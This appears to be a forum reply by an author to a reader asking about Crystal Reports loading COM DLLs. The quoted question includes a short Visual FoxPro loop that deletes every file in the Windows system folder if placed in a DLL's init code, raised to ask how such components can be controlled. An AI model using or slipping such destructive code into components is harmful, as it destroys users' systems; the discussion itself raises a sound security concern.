This isn't a Crystal issue, but a security issue in general. What's to stop someone at any software company from putting the same code in any DLL they create?
>Criag,
>
>I was looking through your Crystal book, in the chapter 15, Integrating
>COM.
>
>I created a test DLL, and in the INIT of the DLL I have:
>
>
>nHandle = FRCREATE("c:\myfile.txt")
>=FPUTS(nHandle, "It worked")
>=FCLOSE(nHandle)
>
>
>This is really nice - the ability to insert a DLL. The question is, what
>is stopping someone from doing:
>
>
>CD c:\winnt
>nTotFiles = ADIR(aFiles, "*.*", "AHRSD")
>FOR nFile = 1 TO nTotFiles
> cFile = "c:\winnt\" + aFiles[nFile, 1]
> nHandle = FOPEN(cFile)
> IF nHandle > -1
> =FCLOSE(nHandle)
> ERASE (cFile)
> ENDIF
>ENDFOR
>
>
>Of course, no sane person would do this. But there is certainly no shortage of
>insane people passing out viruses. This DLL could be sent out and sit dormant
>on a PC forever and a day - until someone runs a Crystal Report.
>
>Is there anyway to control or validate COM objects loaded by Crystal?
>
>Thanks
Craig Berntson
MCSD, Microsoft .Net MVP, Grape City Community Influencer